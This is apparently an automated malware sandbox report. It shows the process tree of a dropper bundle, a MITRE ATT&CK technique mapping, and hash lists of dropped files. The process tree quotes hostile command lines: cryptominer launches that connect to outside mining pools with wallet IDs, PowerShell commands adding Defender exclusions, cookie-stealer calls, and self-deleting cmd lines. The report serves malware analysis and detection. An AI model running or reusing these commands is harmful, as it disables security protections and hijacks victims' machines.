                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dipoy0xy.eor\c7ae36fa.exe & exit
                                                                                              6⤵
                                                                                                PID:3008
                                                                                                • C:\Users\Admin\AppData\Local\Temp\dipoy0xy.eor\c7ae36fa.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\dipoy0xy.eor\c7ae36fa.exe
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:1920
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:1160
                                                                                        • C:\Users\Admin\AppData\Roaming\54A7.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\54A7.tmp.exe"
                                                                                          3⤵
                                                                                            PID:964
                                                                                            • C:\Users\Admin\AppData\Roaming\54A7.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\54A7.tmp.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2224
                                                                                          • C:\Users\Admin\AppData\Roaming\589E.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\589E.tmp.exe"
                                                                                            3⤵
                                                                                              PID:1620
                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w19426@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                4⤵
                                                                                                  PID:2304
                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w14514 --cpu-max-threads-hint 50 -r 9999
                                                                                                  4⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  PID:2436
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                3⤵
                                                                                                  PID:2544
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping 127.0.0.1
                                                                                                    4⤵
                                                                                                    • Runs ping.exe
                                                                                                    PID:2608
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2764
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Modifies system certificate store
                                                                                                PID:1620
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2168
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2420
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  3⤵
                                                                                                    PID:2644
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "-741094726580092468142999214710569190231485185162-1986850951-1159228761040217279"
                                                                                                1⤵
                                                                                                  PID:1344
                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe "624320171-1757621095483335125-17113879521687513447-6681077692070986164-432693154"
                                                                                                  1⤵
                                                                                                    PID:2628
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "-116505987319037449693422187481518995191-602776057-2096988288-499999459-1555165171"
                                                                                                    1⤵
                                                                                                      PID:2412
                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe "436787253-837749338124415070611753909-157013772169507448815529820661892059400"
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2828
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F7D6.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\F7D6.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:2952
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FD63.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\FD63.exe
                                                                                                      1⤵
                                                                                                        PID:748
                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe "-3121185672066541932-1220076921-64246925718514493421342088389-1611285151-478565148"
                                                                                                        1⤵
                                                                                                          PID:2544
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29E0.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\29E0.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3012
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\29E0.exe"
                                                                                                            2⤵
                                                                                                              PID:464
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                3⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:2000
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7062.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7062.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Modifies registry class
                                                                                                            PID:1284
                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                              2⤵
                                                                                                                PID:1692
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\785F.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\785F.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2580
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8A1C.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\8A1C.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops startup file
                                                                                                              • NTFS ADS
                                                                                                              PID:1088
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\90E0.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\90E0.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:3000
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\90E0.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\90E0.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                PID:1516
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9DBD.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\9DBD.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:748
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A7FB.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\A7FB.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2892
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B084.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\B084.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Windows security modification
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:1864
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\858898d0-46f2-4acb-95d7-f1e3a6170741\AdvancedRun.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\858898d0-46f2-4acb-95d7-f1e3a6170741\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\858898d0-46f2-4acb-95d7-f1e3a6170741\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3068
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\858898d0-46f2-4acb-95d7-f1e3a6170741\AdvancedRun.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\858898d0-46f2-4acb-95d7-f1e3a6170741\AdvancedRun.exe" /SpecialRun 4101d8 3068
                                                                                                                  3⤵
                                                                                                                    PID:2376
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\B084.exe" -Force
                                                                                                                  2⤵
                                                                                                                    PID:2304
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B084.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\B084.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2984
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B084.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\B084.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1524
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BC67.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\BC67.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Windows security modification
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Modifies system certificate store
                                                                                                                  PID:2208
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5ef6d819-2452-4305-abf1-f4c00bd72fe0\AdvancedRun.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\5ef6d819-2452-4305-abf1-f4c00bd72fe0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5ef6d819-2452-4305-abf1-f4c00bd72fe0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2912
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5ef6d819-2452-4305-abf1-f4c00bd72fe0\AdvancedRun.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\5ef6d819-2452-4305-abf1-f4c00bd72fe0\AdvancedRun.exe" /SpecialRun 4101d8 2912
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2264
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\BC67.exe" -Force
                                                                                                                    2⤵
                                                                                                                      PID:2876
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BC67.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\BC67.exe"
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1816
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BC67.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\BC67.exe"
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:2232
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Windows security modification
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Modifies system certificate store
                                                                                                                        PID:2164
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ce0431aa-92da-408f-bd60-472e46e5694e\AdvancedRun.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ce0431aa-92da-408f-bd60-472e46e5694e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ce0431aa-92da-408f-bd60-472e46e5694e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2304
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ce0431aa-92da-408f-bd60-472e46e5694e\AdvancedRun.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ce0431aa-92da-408f-bd60-472e46e5694e\AdvancedRun.exe" /SpecialRun 4101d8 2304
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2408
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe" -Force
                                                                                                                          4⤵
                                                                                                                            PID:752
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"
                                                                                                                            4⤵
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:1540
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:744
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:2068
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:2392
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:556
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:2356
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:2348
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:2480
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:2564
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:3060
                                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
                                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2376
                                                                                                                        • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
                                                                                                                          "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\WatchRead.pdf"
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2296
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\528F.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\528F.exe
                                                                                                                          1⤵
                                                                                                                          • Adds Run key to start application
                                                                                                                          PID:2736
                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                            icacls "C:\Users\Admin\AppData\Local\dc3ec97f-0d79-4a61-b4db-476c728d41e0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:2388
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\528F.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\528F.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                            2⤵
                                                                                                                              PID:2004
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\62B6.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\62B6.exe
                                                                                                                            1⤵
                                                                                                                              PID:2460

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                            Persistence

                                                                                                                            Modify Existing Service

                                                                                                                            1
                                                                                                                            T1031

                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                            1
                                                                                                                            T1060

                                                                                                                            BITS Jobs

                                                                                                                            1
                                                                                                                            T1197

                                                                                                                            Defense Evasion

                                                                                                                            Modify Registry

                                                                                                                            6
                                                                                                                            T1112

                                                                                                                            Disabling Security Tools

                                                                                                                            3
                                                                                                                            T1089

                                                                                                                            File Permissions Modification

                                                                                                                            1
                                                                                                                            T1222

                                                                                                                            BITS Jobs

                                                                                                                            1
                                                                                                                            T1197

                                                                                                                            Install Root Certificate

                                                                                                                            1
                                                                                                                            T1130

                                                                                                                            Credential Access

                                                                                                                            Credentials in Files

                                                                                                                            3
                                                                                                                            T1081

                                                                                                                            Discovery

                                                                                                                            Software Discovery

                                                                                                                            1
                                                                                                                            T1518

                                                                                                                            Security Software Discovery

                                                                                                                            1
                                                                                                                            T1063

                                                                                                                            Query Registry

                                                                                                                            3
                                                                                                                            T1012

                                                                                                                            System Information Discovery

                                                                                                                            4
                                                                                                                            T1082

                                                                                                                            Peripheral Device Discovery

                                                                                                                            1
                                                                                                                            T1120

                                                                                                                            Remote System Discovery

                                                                                                                            1
                                                                                                                            T1018

                                                                                                                            Collection

                                                                                                                            Data from Local System

                                                                                                                            3
                                                                                                                            T1005

                                                                                                                            Command and Control

                                                                                                                            Web Service

                                                                                                                            1
                                                                                                                            T1102

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                              MD5

                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                              SHA1

                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                              SHA256

                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                              SHA512

                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                              MD5

                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                              SHA1

                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                              SHA256

                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                              SHA512

                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                            • C:\Program Files\Windows Sidebar\ULESBALBBH\ultramediaburner.exe
                                                                                                                              MD5

                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                              SHA1

                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                              SHA256

                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                              SHA512

                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                            • C:\Program Files\Windows Sidebar\ULESBALBBH\ultramediaburner.exe
                                                                                                                              MD5

                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                              SHA1

                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                              SHA256

                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                              SHA512

                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                            • C:\Program Files\install.dat
                                                                                                                              MD5

                                                                                                                              806c3221a013fec9530762750556c332

                                                                                                                              SHA1

                                                                                                                              36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                              SHA256

                                                                                                                              9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                              SHA512

                                                                                                                              56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                            • C:\Program Files\install.dll
                                                                                                                              MD5

                                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                              SHA1

                                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                              SHA256

                                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                              SHA512

                                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                              MD5

                                                                                                                              68e9a1027329cca12ceaedb556926074

                                                                                                                              SHA1

                                                                                                                              b566d70b93917a21c908fbd4fdc9cf894ac8c281

                                                                                                                              SHA256

                                                                                                                              a1f80ddb587f2a8e65a364f4fac86c8b40a1460823ddbbacda40ca9a1c0391a1

                                                                                                                              SHA512

                                                                                                                              ff8270955fd1fca5dfd2cc89bd1bd89ca4756eb78729bde44196fe6a8a05e528e4ec8bec2b20269d688c4a5d63f5e29f0236ab8ede39e68a5d169ff7e4de2207

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                              MD5

                                                                                                                              6bd8afb1c2db26c9ed3a6f222adbec6d

                                                                                                                              SHA1

                                                                                                                              a5b6f1fcd774f1566f98300f7e739ada585dd4b5

                                                                                                                              SHA256

                                                                                                                              10c58acf982d3706cf3c0a86d8ea2b72fd8eb3920fcc7aa380a6062ed5023444

                                                                                                                              SHA512

                                                                                                                              6ca130fc2980e169e2cea9cd2812bf48b5a95caa3466aed88d026c60c81014ae562a5399ebe47f29a47c46c40ddd6982e2ae949938f2efebba6ae032057afb15

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                              MD5

                                                                                                                              707c763bde9adef3aa70b77811b4ba46

                                                                                                                              SHA1

                                                                                                                              adb716602950a3ad43e0b5bae962253c61fe0de3

                                                                                                                              SHA256

                                                                                                                              ce715ac42a2c25d723f1d331e1c7ff62dc2eca3c4e70e0c0678a20676d954240

                                                                                                                              SHA512

                                                                                                                              59dd574f1035de9b8cf07902f9dcd6300298124ce632ac5bd949641460c7b257245b1045588e79a537d0a6c18384af5b00feacb3d0b39e60b09459dc6b75d33d

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4a-664fc-1fb-6c0aa-f9506f177a714\Nupagiryvy.exe
                                                                                                                              MD5

                                                                                                                              4aa6bbf2d091a9a87bac124c0adfc3f6

                                                                                                                              SHA1

                                                                                                                              a55729544d103ee3b40d13d12af5a5d87d2a6ead

                                                                                                                              SHA256

                                                                                                                              a584649ea9d8e4d8fd9a30bc6d2579421f59ef2ae2a076cf083b5cd567628688

                                                                                                                              SHA512

                                                                                                                              e3e71a968a2ed268a001959b5fb006fedee6c24820cb23cf68ba7bb83d5c8faf56f109a91373d6bb5728658d779bd6a002b54ea46b32dc7cb75f9a16751ce378

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4a-664fc-1fb-6c0aa-f9506f177a714\Nupagiryvy.exe
                                                                                                                              MD5

                                                                                                                              4aa6bbf2d091a9a87bac124c0adfc3f6

                                                                                                                              SHA1

                                                                                                                              a55729544d103ee3b40d13d12af5a5d87d2a6ead

                                                                                                                              SHA256

                                                                                                                              a584649ea9d8e4d8fd9a30bc6d2579421f59ef2ae2a076cf083b5cd567628688

                                                                                                                              SHA512

                                                                                                                              e3e71a968a2ed268a001959b5fb006fedee6c24820cb23cf68ba7bb83d5c8faf56f109a91373d6bb5728658d779bd6a002b54ea46b32dc7cb75f9a16751ce378

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4a-664fc-1fb-6c0aa-f9506f177a714\Nupagiryvy.exe.config
                                                                                                                              MD5

                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                              SHA1

                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                              SHA256

                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                              SHA512

                                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9e-a1444-7c6-f68a8-e809f71aadce8\Vocaevabaha.exe
                                                                                                                              MD5

                                                                                                                              416cdf5a20930fc452afc2b2226e0296

                                                                                                                              SHA1

                                                                                                                              7392192ab84730fe2b1d295f78ce9ee228f71c0d

                                                                                                                              SHA256

                                                                                                                              85420e807cda618caf01eddeb5adbb3875a07eab79ec5d0b442717f219b6bda1

                                                                                                                              SHA512

                                                                                                                              b1c007ce8e27d1cf17a1ca585672236eabafc54a67b715e8b68af82cd2b837f306d6364a934339c74fa954c61be809a42c4a2b39aa6b1060817cdb0bd9ea371d

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9e-a1444-7c6-f68a8-e809f71aadce8\Vocaevabaha.exe
                                                                                                                              MD5

                                                                                                                              416cdf5a20930fc452afc2b2226e0296

                                                                                                                              SHA1

                                                                                                                              7392192ab84730fe2b1d295f78ce9ee228f71c0d

                                                                                                                              SHA256

                                                                                                                              85420e807cda618caf01eddeb5adbb3875a07eab79ec5d0b442717f219b6bda1

                                                                                                                              SHA512

                                                                                                                              b1c007ce8e27d1cf17a1ca585672236eabafc54a67b715e8b68af82cd2b837f306d6364a934339c74fa954c61be809a42c4a2b39aa6b1060817cdb0bd9ea371d

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9e-a1444-7c6-f68a8-e809f71aadce8\Vocaevabaha.exe.config
                                                                                                                              MD5

                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                              SHA1

                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                              SHA256

                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                              SHA512

